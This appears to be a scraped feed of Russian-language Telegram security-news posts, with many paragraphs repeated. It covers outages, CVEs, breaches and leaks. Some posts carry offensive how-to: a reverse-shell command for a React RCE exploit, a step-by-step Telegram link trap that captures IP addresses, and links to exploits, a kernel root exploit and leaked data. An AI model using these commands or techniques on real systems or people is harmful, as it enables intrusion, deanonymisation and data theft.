Одна строчка кода на Rust сломала весь интернет
Cloudflare выпустили разбор вчерашнего инцидента. Выяснилось, что у них лег сервис Bot Management, который используют для защиты от DDoS.
Архитектура этого сервиса устроена так, есть
1. Clickhouse, где Cloudflare хранит список правил для защиты от ботов
2. Cron-скрипт, который вычитывает БД, и генерирует список правил для раскатки на серверы
3. Скрипт на Rust, на самих серверах, который берет правила и применяет их
На первом этапе инженеры внесли изменение в Clickhouse, в результате которых на втором шаге создался список правил в 2 раза больше, чем обычно.
На этапе 3 скрипт понял, что файл превышает лимиты размера, и споткнулся об
Сначала в Cloudflare думали, что это атака нового ботнета Aisuru, который недавно поставил рекорд мощностью 15 Tbps. Но в результате ошибки инженеров самой компании полегло куча сервисов, включая X/Twitter, ChatGPT, Spotify, Canva, и McDonald's.
Cloudflare выпустили разбор вчерашнего инцидента. Выяснилось, что у них лег сервис Bot Management, который используют для защиты от DDoS.
Архитектура этого сервиса устроена так, есть
1. Clickhouse, где Cloudflare хранит список правил для защиты от ботов
2. Cron-скрипт, который вычитывает БД, и генерирует список правил для раскатки на серверы
3. Скрипт на Rust, на самих серверах, который берет правила и применяет их
На первом этапе инженеры внесли изменение в Clickhouse, в результате которых на втором шаге создался список правил в 2 раза больше, чем обычно.
На этапе 3 скрипт понял, что файл превышает лимиты размера, и споткнулся об
.unwrap(), который отправил его в panic и аварийно завершил работу (вместо того, чтобы проигнорировать "плохой" список) на всех инстансах по всему миру.Сначала в Cloudflare думали, что это атака нового ботнета Aisuru, который недавно поставил рекорд мощностью 15 Tbps. Но в результате ошибки инженеров самой компании полегло куча сервисов, включая X/Twitter, ChatGPT, Spotify, Canva, и McDonald's.
Ваши фото счетчиков под угрозой
Плохие новости от GrapheneOS — создатели приватной прошивки пишут о том, что французские силовики проплатили медиа, чтобы дискредитировать проект.
Причина в том, что даже софт от Cellebrite не может справиться с "операционкой", поэтому местные полицейские начали давить на GrapheneOS с просьбой внедрить бэкдор, под предлогом борьбы с наркотиками.
Создатели проекта, конечно, отказали, и теперь вынуждены поспешно мигрировать всю инфраструктуру (сервера обновлений, главный сайт, форум) с французского хостинга OVHcloud в США, Англию, и Канаду.
Кстати, именно французские власти начали изначально пушить инициативу "EU Chat Control" в ЕС со сканированием личных сообщений. Более того, за отказ разблокировать смартфон во Франции можно получить уголовку, от 3-х до 5-ти лет.
Плохие новости от GrapheneOS — создатели приватной прошивки пишут о том, что французские силовики проплатили медиа, чтобы дискредитировать проект.
Причина в том, что даже софт от Cellebrite не может справиться с "операционкой", поэтому местные полицейские начали давить на GrapheneOS с просьбой внедрить бэкдор, под предлогом борьбы с наркотиками.
Создатели проекта, конечно, отказали, и теперь вынуждены поспешно мигрировать всю инфраструктуру (сервера обновлений, главный сайт, форум) с французского хостинга OVHcloud в США, Англию, и Канаду.
Кстати, именно французские власти начали изначально пушить инициативу "EU Chat Control" в ЕС со сканированием личных сообщений. Более того, за отказ разблокировать смартфон во Франции можно получить уголовку, от 3-х до 5-ти лет.
1
Когда подключаешься к WiFi где-нибудь в коворкинге и пытаешься просканить хосты, можно ничего не найти из-за их изоляции. Pulse Security рассказали о том, как ее можно обойти.
Дело в том, что изоляция работает на уровне роутера, запрос идет так: твой ПК => роутер => ПК другого клиента. В этой схеме роутер отбрасывает все, что ты пытаешься отправить кому-то в сети во время сканирования.
Но радиоволна не знает про изоляцию. Кадр, который отправляешь в эфир, физически доходит до всех. Чтобы обойти изоляцию, достаточно создать 802.11 кадр с флагом From-DS-1 (прикинувшись роутером) и отправить его напрямую клиенту, а затем прослушать эфир на наличие ответа.
Это касается незашифрованных сетей. Но способ будет работать и для WPA2-CCMP-PSK, который используется повсеместно. Достаточно провести DeAuth, перехватить хэндшейк, вычислить Temporal Key (ключ шифрования), и установить соединение с клиентом, а дальше по описанной схеме.
PoC уже выложили на GitHub, а в самой статье показали рабочий пример скана с nmap и подключение к VNC на другой тачке.
Дело в том, что изоляция работает на уровне роутера, запрос идет так: твой ПК => роутер => ПК другого клиента. В этой схеме роутер отбрасывает все, что ты пытаешься отправить кому-то в сети во время сканирования.
Но радиоволна не знает про изоляцию. Кадр, который отправляешь в эфир, физически доходит до всех. Чтобы обойти изоляцию, достаточно создать 802.11 кадр с флагом From-DS-1 (прикинувшись роутером) и отправить его напрямую клиенту, а затем прослушать эфир на наличие ответа.
Это касается незашифрованных сетей. Но способ будет работать и для WPA2-CCMP-PSK, который используется повсеместно. Достаточно провести DeAuth, перехватить хэндшейк, вычислить Temporal Key (ключ шифрования), и установить соединение с клиентом, а дальше по описанной схеме.
PoC уже выложили на GitHub, а в самой статье показали рабочий пример скана с nmap и подключение к VNC на другой тачке.
GitHub
GitHub - Pulse-Security/wifi-client-isolation-bypass: Bypass WiFi client isolation on Open and WPA2-PSK networks
Bypass WiFi client isolation on Open and WPA2-PSK networks - Pulse-Security/wifi-client-isolation-bypass
🔥 10/10 React4shell
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Just when I thought the day was over… CVE-2025-55182 shows up 🫠
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
react.dev
Critical Security Vulnerability in React Server Components – React
The library for web and native user interfaces
Cybred
🔥 10/10 React4shell В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku. Just when I thought the…
Рабочий эксплоит
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
11
n8n RCE CVE-2025-68613
Любой пользователь может исполнять код на сервере, достаточно создать воркфлоу как на скрине.
Уязвимы версии:
— от 0.211.0 до 1.120.3
— 1.121.0
Эксплойт: https://github.com/wioui/n8n-CVE-2025-68613-exploit
Любой пользователь может исполнять код на сервере, достаточно создать воркфлоу как на скрине.
Уязвимы версии:
— от 0.211.0 до 1.120.3
— 1.121.0
Эксплойт: https://github.com/wioui/n8n-CVE-2025-68613-exploit
2
Тайна Эпштейна раскрыта
Недавно опубликовали файлы по делу Эпштейна, и это сразу же стало мемом, поскольку их настолько сильно зацензурили, что многие страницы невозможно прочитать.
Но пользователь с реддита обнаружил, что цензуру можно обойти. Дело в том, что редактор скрывает текст наложением на него черного прямоугольника. И такие программы, как Adobe Acrobat удаляют все, что находится под ним, а другие — нет.
Так и случилось в этот раз — у опубликованных PDF-файлов оказалось два слоя, и тот, что скрывает текст под собой, можно запросто убрать и прочитать все содержимое.
Конечно, это можно сделать не со всеми файлами. Но проблема встречается довольно часто. Так, в 2014 году The New Times опубликовал документ, в которых случайно раскрыли имя агента спецслужб. Проблема стала настолько серьезной, что NSA даже написали собственный гайдлайн для сотрудников.
Но главное — на Github релизнули утилиту, которая может быть полезна для показа скрытого текста https://github.com/leedrake5/unredact
Недавно опубликовали файлы по делу Эпштейна, и это сразу же стало мемом, поскольку их настолько сильно зацензурили, что многие страницы невозможно прочитать.
Но пользователь с реддита обнаружил, что цензуру можно обойти. Дело в том, что редактор скрывает текст наложением на него черного прямоугольника. И такие программы, как Adobe Acrobat удаляют все, что находится под ним, а другие — нет.
Так и случилось в этот раз — у опубликованных PDF-файлов оказалось два слоя, и тот, что скрывает текст под собой, можно запросто убрать и прочитать все содержимое.
Конечно, это можно сделать не со всеми файлами. Но проблема встречается довольно часто. Так, в 2014 году The New Times опубликовал документ, в которых случайно раскрыли имя агента спецслужб. Проблема стала настолько серьезной, что NSA даже написали собственный гайдлайн для сотрудников.
Но главное — на Github релизнули утилиту, которая может быть полезна для показа скрытого текста https://github.com/leedrake5/unredact
7 миллионов долларов за 1 день
Украл хакер с помощью бэкдора в Trust Wallet. В официальном расширении он изменил домен PostHog (сервис для аналитики) на собственный и добавил сбор мнемонических фраз пользователей.
На подготовку ушло две недели (8-22 декабря), а 25 декабря он уже начал переводить деньги с украденных кошельков
Одна из пострадавших уже поделилась, как это произошло
Версия с бэкдором —
UPD: ZachXBT сообщил, что сообщение оставил скамер
Украл хакер с помощью бэкдора в Trust Wallet. В официальном расширении он изменил домен PostHog (сервис для аналитики) на собственный и добавил сбор мнемонических фраз пользователей.
На подготовку ушло две недели (8-22 декабря), а 25 декабря он уже начал переводить деньги с украденных кошельков
Одна из пострадавших уже поделилась, как это произошло
Я возвращалась с Рождества, проведённого с семьёй. С волнением собиралась проверить рынки — вдруг удастся поймать какие-то возможности на этой годовой просадке.
Вместо этого я открыла кошелёк и увидела, что +$300 000 просто исчезли.
Браузерное расширение Trust Wallet оказалось скомпрометированным.
Всё, что я строила. Украдено в Рождество.
...
Я в крипте с 2018 года. Я знаю риски. Для долгосрочных активов я использую аппаратные кошельки. Я никогда не подключаюсь к подозрительным dApp’ам. Я дотошно проверяю и регулярно аудитю все разрешения.
Я сделала всё «правильно».
И всё равно — скомпрометированное расширение опустошило мой торговый аккаунт всего за 4 минуты.
Версия с бэкдором —
2.68, будьте осторожны.UPD: ZachXBT сообщил, что сообщение оставил скамер
Forwarded from infosec
• Неизвестная группа хакеров взломали Ubisoft и разослали игрокам Rainbow Six Siege внутреннюю валюту на сумму 339 000 000 000 баксов, чем вызвали настоящий хаос.
• Разработчики решили отключить сервера Rainbow Six Siege и маркетплейс игры, пока команда работает над устранением уязвимости и откатывает баланс игроков. Сообщается, что причиной взлома могла стать критическая уязвимость в базе данных MongoDB, которая позволяет хакерам получить доступ к внутренним репозиториям и исходному коду.
• Тем временем, пока разработчикик решают проблему, в сети появилось несколько групп, которые утверждают, что причастны ко взлому. Следите за руками:
• Первая группа - ответственная за взлом Rainbow Six Siege. Они раздали внутриигровую валюту и ушли в тень. О них нет никакой другой информации.
• Вторая группа утверждает, что у них есть исходный код Ubisoft. Они заявили, что использовали уязвимость в MongoDB, а затем проникли во внутренние Git-репозитории Ubisoft и похитили большой архив с исходными кодами игр компании. Чуть позже выяснилось, что информация является фейком. Однако у них есть другие внутренние данные от Ubisoft (читайте о группе 5)
• Третья группа - опубликовали в Telegram информацию, утверждая, что взломал Ubisoft. Они используют поддельные данные, чтобы запугать Ubisoft и получить денежное вознаграждение. Но все их сообщения являются фейком.
• Четвертая группа пишет о том, что вторая группа пытается выдать себя за первую группу!
• Пятая группа появилась только сегодня - предоставила описание уязвимости, благодаря которой первая группа смогла разослать игровую валюту всем игрокам. Еще они показали, как именно вторая группа получила внутренние данные Ubisoft (какие именно данные - не уточняется).
• Все перечисленные группы, кроме группы 3, знают друг друга и поддерживают коммуникацию между собой в той или иной степени, это в основном хардкорное сообщество гиков Ubisoft.
• Что, черт возьми, происходит?
➡ https://xn--r1a.website/vxunderground/7838
➡ https://www.dexerto.com/rainbow-six
#Новости
• Разработчики решили отключить сервера Rainbow Six Siege и маркетплейс игры, пока команда работает над устранением уязвимости и откатывает баланс игроков. Сообщается, что причиной взлома могла стать критическая уязвимость в базе данных MongoDB, которая позволяет хакерам получить доступ к внутренним репозиториям и исходному коду.
• Тем временем, пока разработчикик решают проблему, в сети появилось несколько групп, которые утверждают, что причастны ко взлому. Следите за руками:
• Первая группа - ответственная за взлом Rainbow Six Siege. Они раздали внутриигровую валюту и ушли в тень. О них нет никакой другой информации.
• Вторая группа утверждает, что у них есть исходный код Ubisoft. Они заявили, что использовали уязвимость в MongoDB, а затем проникли во внутренние Git-репозитории Ubisoft и похитили большой архив с исходными кодами игр компании. Чуть позже выяснилось, что информация является фейком. Однако у них есть другие внутренние данные от Ubisoft (читайте о группе 5)
• Третья группа - опубликовали в Telegram информацию, утверждая, что взломал Ubisoft. Они используют поддельные данные, чтобы запугать Ubisoft и получить денежное вознаграждение. Но все их сообщения являются фейком.
• Четвертая группа пишет о том, что вторая группа пытается выдать себя за первую группу!
• Пятая группа появилась только сегодня - предоставила описание уязвимости, благодаря которой первая группа смогла разослать игровую валюту всем игрокам. Еще они показали, как именно вторая группа получила внутренние данные Ubisoft (какие именно данные - не уточняется).
• Все перечисленные группы, кроме группы 3, знают друг друга и поддерживают коммуникацию между собой в той или иной степени, это в основном хардкорное сообщество гиков Ubisoft.
• Что, черт возьми, происходит?
#Новости
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
22
А я напоминаю ☝️: в преддверии ❄️Нового года❄️ некоторые снова начнут распространять свой псиоп📡 против Санты🎅.
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
This media is not supported in your browser
VIEW IN TELEGRAM
https://github.com/farazsth98/chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
5.10.x.Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
Malwarebytes сообщает, что слили Instagram
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
This media is not supported in your browser
VIEW IN TELEGRAM
Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Secrets Patterns Database
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
1
Взлом LADA
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
— 22 сервера Proxmox;
— 22 NAS-хранилища с общим объёмом ~100 ТБ данных (всё вкусное — выгружено);
— Все UNIX-системы (заминированы логическими бомбами — саперам привет);
— Домен Active Directory на ~800 машин;
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Там огромная коллекция «клубники»: русскоязычное домашнее и любительское, жёсткие сцены, рипы с LegalPorno/EvilAngel/Tushy, плюс в других папках старая зоо-коллекция. Файлы с 2006 по 2024, всё в куче, активно раздаётся через uTorrent.